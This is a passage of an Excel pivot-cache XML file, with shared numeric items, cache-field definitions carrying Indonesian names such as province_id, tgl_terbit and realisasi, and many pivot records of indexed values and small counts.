        <n v="5154"/>
        <n v="5103"/>
        <n v="5189"/>
        <n v="1035"/>
        <n v="736"/>
        <n v="2821"/>
        <n v="1805"/>
        <n v="1311"/>
        <n v="1969"/>
        <n v="5171"/>
        <n v="1318"/>
        <n v="1518"/>
        <n v="1296"/>
        <n v="5137"/>
        <n v="1195"/>
        <n v="549"/>
        <n v="1443"/>
        <n v="446"/>
        <n v="5222"/>
        <n v="1434"/>
        <n v="4827"/>
        <n v="5007"/>
        <n v="537"/>
        <n v="1302"/>
        <n v="5221"/>
        <n v="1468"/>
        <n v="5102"/>
        <n v="1641"/>
        <n v="1113"/>
        <n v="1527"/>
        <n v="51"/>
        <n v="35"/>
        <n v="5240"/>
        <n v="5197"/>
        <n v="1116"/>
        <n v="1388"/>
        <n v="1404"/>
        <n v="1500"/>
        <n v="515"/>
        <n v="1512"/>
        <n v="911"/>
        <n v="365"/>
        <n v="5251"/>
        <n v="4911"/>
        <n v="1418"/>
        <n v="253"/>
        <n v="1465"/>
        <n v="5238"/>
        <n v="1341"/>
        <n v="5237"/>
        <n v="5255"/>
        <n v="976"/>
        <n v="1956"/>
        <n v="5234"/>
        <n v="5203"/>
        <n v="5244"/>
        <n v="5270"/>
        <n v="4901"/>
        <n v="1515"/>
        <n v="1406"/>
        <n v="5261"/>
        <n v="5205"/>
        <n v="1502"/>
        <n v="1508"/>
        <n v="1375"/>
        <n v="5195"/>
        <n v="5256"/>
        <n v="5257"/>
        <n v="1414"/>
        <n v="1720"/>
        <n v="1198"/>
        <n v="5258"/>
        <n v="1437"/>
        <n v="5254"/>
        <n v="124"/>
        <n v="1487"/>
        <n v="5039"/>
        <n v="5131"/>
        <n v="1619"/>
        <n v="466"/>
        <n v="438"/>
        <n v="5291"/>
        <n v="2367"/>
        <n v="1571"/>
        <n v="5204"/>
        <n v="5281"/>
        <n v="1417"/>
        <n v="5057"/>
        <n v="5273"/>
        <n v="5275"/>
        <n v="5272"/>
        <n v="5249"/>
        <n v="5298"/>
        <n v="1402"/>
        <n v="5274"/>
        <n v="485"/>
        <n v="5296"/>
        <n v="5276"/>
        <n v="1939"/>
        <n v="495"/>
        <n v="5305"/>
        <n v="5124"/>
        <n v="5247"/>
        <n v="1391"/>
        <n v="594"/>
        <n v="5288"/>
        <n v="540"/>
        <n v="1078"/>
        <n v="1249"/>
        <n v="5304"/>
        <n v="1327"/>
        <n v="5168"/>
        <n v="5306"/>
        <n v="5309"/>
        <n v="5307"/>
        <n v="1668"/>
        <n v="1746"/>
        <n v="1324"/>
        <n v="950"/>
        <n v="1655"/>
        <n v="1675"/>
        <n v="1543"/>
        <n v="5301"/>
        <n v="5325"/>
        <n v="1272"/>
        <n v="1640"/>
        <n v="1509"/>
        <n v="1386"/>
        <n v="5299"/>
        <n v="5310"/>
        <n v="1478"/>
        <n v="1455"/>
        <n v="5293"/>
        <n v="5326"/>
        <n v="1612"/>
        <n v="1206"/>
        <n v="1497"/>
        <n v="5242"/>
        <n v="82"/>
        <n v="117"/>
        <n v="1556"/>
        <n v="1266"/>
        <n v="5435"/>
        <n v="1597"/>
        <n v="5053"/>
        <n v="5427"/>
        <n v="1489"/>
        <n v="5426"/>
        <n v="5439"/>
        <n v="92"/>
        <n v="91"/>
        <n v="2733"/>
        <n v="1285"/>
        <n v="1676"/>
        <n v="1781"/>
        <n v="1177"/>
        <n v="2204"/>
        <n v="5451"/>
        <n v="1638"/>
        <n v="5468"/>
        <n v="5469"/>
        <n v="1595"/>
        <n v="111"/>
        <n v="102"/>
        <n v="1469"/>
        <n v="5140"/>
        <n v="1748"/>
        <n v="1690"/>
        <n v="1393"/>
        <n v="1453"/>
        <n v="10"/>
        <n v="1132"/>
        <n v="5432"/>
        <n v="5182"/>
        <n v="5218"/>
        <n v="1463"/>
        <n v="1452"/>
        <n v="1348"/>
        <n v="1517"/>
        <n v="5440"/>
        <n v="1054"/>
        <n v="5475"/>
        <n v="1589"/>
        <n v="1397"/>
        <n v="1398"/>
        <n v="5491"/>
        <n v="632"/>
        <n v="1278"/>
        <n v="4819"/>
        <n v="2124"/>
        <n v="1175"/>
        <n v="5454"/>
        <n v="5166"/>
        <n v="5232"/>
        <n v="5480"/>
        <n v="1361"/>
        <n v="2186"/>
        <n v="112"/>
        <n v="1653"/>
        <n v="1445"/>
        <n v="1772"/>
        <n v="5510"/>
        <n v="5311"/>
        <n v="5504"/>
        <n v="567"/>
        <n v="108"/>
        <n v="5505"/>
        <n v="5507"/>
        <n v="5509"/>
        <n v="5474"/>
        <n v="1658"/>
        <n v="1700"/>
        <n v="1771"/>
        <n v="5098"/>
        <n v="1634"/>
        <n v="5465"/>
        <n v="1699"/>
        <n v="5479"/>
        <n v="5535"/>
        <n v="5492"/>
        <n v="5452"/>
        <n v="5278"/>
        <n v="5115"/>
        <n v="5523"/>
        <n v="1492"/>
        <n v="1799"/>
        <n v="1621"/>
        <n v="5283"/>
        <n v="1840"/>
        <n v="2429"/>
        <n v="5477"/>
        <n v="1953"/>
        <n v="2129"/>
        <n v="5330"/>
        <n v="162"/>
        <n v="5314"/>
        <n v="1270"/>
        <n v="1170"/>
        <n v="5540"/>
        <n v="5570"/>
        <n v="1842"/>
        <n v="1559"/>
        <n v="5483"/>
        <n v="5444"/>
        <n v="5485"/>
        <n v="2247"/>
        <n v="1759"/>
        <n v="5456"/>
        <n v="5561"/>
        <n v="1531"/>
        <n v="5554"/>
        <n v="529"/>
        <n v="5543"/>
        <n v="2624"/>
        <n v="1858"/>
        <n v="1667"/>
        <n v="204"/>
        <n v="2009"/>
        <n v="5290"/>
        <n v="5582"/>
        <n v="5476"/>
        <n v="5473"/>
        <n v="5191"/>
        <n v="1745"/>
        <n v="1637"/>
        <n v="5541"/>
        <n v="5594"/>
        <n v="5611"/>
        <n v="2203"/>
        <n v="2853"/>
        <n v="1850"/>
        <n v="1689"/>
        <n v="161"/>
        <n v="1581"/>
        <n v="5568"/>
        <n v="5461"/>
        <n v="5446"/>
        <n v="1767"/>
        <n v="922"/>
        <n v="2658"/>
        <n v="1229"/>
        <n v="5604"/>
        <n v="932"/>
        <n v="1446"/>
        <n v="5626"/>
        <n v="1470"/>
        <n v="5522"/>
        <n v="784"/>
        <n v="1845"/>
        <n v="5193"/>
        <n v="5639"/>
        <n v="5617"/>
        <n v="5613"/>
        <n v="2164"/>
        <n v="5645"/>
        <n v="5643"/>
        <n v="5220"/>
        <n v="5628"/>
        <n v="5627"/>
        <n v="332"/>
        <n v="1779"/>
        <n v="1157"/>
        <n v="1804"/>
        <n v="5615"/>
        <n v="1732"/>
        <n v="1025"/>
        <n v="5651"/>
        <n v="5625"/>
        <n v="5495"/>
        <n v="5549"/>
        <n v="296"/>
        <n v="1844"/>
        <n v="5672"/>
        <n v="5640"/>
        <n v="5644"/>
        <n v="5669"/>
        <n v="5650"/>
        <n v="1835"/>
        <n v="1448"/>
        <n v="1768"/>
        <n v="5667"/>
        <n v="5649"/>
        <n v="1877"/>
        <n v="2231"/>
        <n v="5676"/>
        <n v="5684"/>
        <n v="5681"/>
        <n v="959"/>
        <n v="5637"/>
        <n v="1890"/>
        <n v="5687"/>
        <n v="1510"/>
        <n v="1029"/>
        <n v="5693"/>
        <n v="1808"/>
        <n v="5466"/>
        <n v="5674"/>
        <n v="4828"/>
        <n v="883"/>
        <n v="5678"/>
        <n v="5679"/>
        <n v="5631"/>
        <n v="5642"/>
        <n v="5665"/>
        <n v="5715"/>
        <n v="5699"/>
        <n v="5695"/>
        <n v="1734"/>
        <n v="5673"/>
        <n v="5694"/>
        <n v="715"/>
        <n v="1860"/>
        <n v="1593"/>
        <n v="5623"/>
        <n v="5527"/>
        <n v="1644"/>
        <n v="511"/>
        <n v="1312"/>
        <n v="1902"/>
        <n v="5766"/>
        <n v="1848"/>
        <n v="5734"/>
        <n v="5774"/>
        <n v="5481"/>
        <n v="5755"/>
        <n v="5754"/>
        <n v="1776"/>
        <n v="2202"/>
        <n v="5714"/>
        <n v="5799"/>
        <n v="5800"/>
        <n v="5686"/>
        <n v="5768"/>
        <n v="5700"/>
        <n v="1033"/>
        <n v="1072"/>
        <n v="5106"/>
        <n v="1522"/>
        <n v="5620"/>
        <n v="5772"/>
        <n v="2324"/>
        <n v="5819"/>
        <n v="5818"/>
        <n v="2120"/>
        <n v="5928"/>
        <n v="5790"/>
        <n v="5622"/>
        <n v="5671"/>
        <n v="5929"/>
        <n v="1977"/>
      </sharedItems>
    </cacheField>
    <cacheField name="zero_upi_name" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="alamat_printed" numFmtId="0">
      <sharedItems containsDate="1" containsMixedTypes="1" minDate="2020-02-03T00:00:00" maxDate="2020-02-04T00:00:00"/>
    </cacheField>
    <cacheField name="province_id" numFmtId="0">
      <sharedItems containsString="0" containsBlank="1" containsNumber="1" containsInteger="1" minValue="1" maxValue="100000"/>
    </cacheField>
    <cacheField name="produk_ind" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="tgl_terbit" numFmtId="0">
      <sharedItems containsDate="1" containsBlank="1" containsMixedTypes="1" minDate="2020-01-06T00:00:00" maxDate="2021-07-06T00:00:00"/>
    </cacheField>
    <cacheField name="realisasi" numFmtId="0">
      <sharedItems containsBlank="1" containsMixedTypes="1" containsNumber="1" minValue="0" maxValue="3092591000"/>
    </cacheField>
    <cacheField name="lokal" numFmtId="0">
      <sharedItems containsBlank="1" longText="1"/>
    </cacheField>
    <cacheField name="ekspor"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48">
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="0"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="0"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="0"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="6"/>
    <x v="1"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="2"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="2"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="2"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="2"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="2"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="2"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="3"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="4"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="42"/>
    <x v="4"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="52"/>
    <x v="4"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="4"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="10"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="5"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="5"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="5"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="5"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="5"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="6"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="6"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="6"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="11"/>
    <x v="6"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="6"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="82"/>
    <x v="6"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="6"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="6"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="7"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="7"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="9"/>
    <x v="7"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="7"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="54"/>
    <x v="7"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="136"/>
    <x v="7"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="7"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="7"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="8"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="8"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="8"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="8"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="8"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="9"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="9"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="9"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="9"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="9"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="36"/>
    <x v="9"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="9"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="9"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="10"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="10"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="10"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="10"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="10"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="10"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="10"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="10"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="10"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="10"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="10"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="10"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="10"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="10"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="11"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="11"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="11"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="12"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="12"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="12"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="12"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="12"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="13"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="13"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="13"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="13"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="14"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="20"/>
    <x v="14"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="14"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="14"/>
  </r>
  <r>
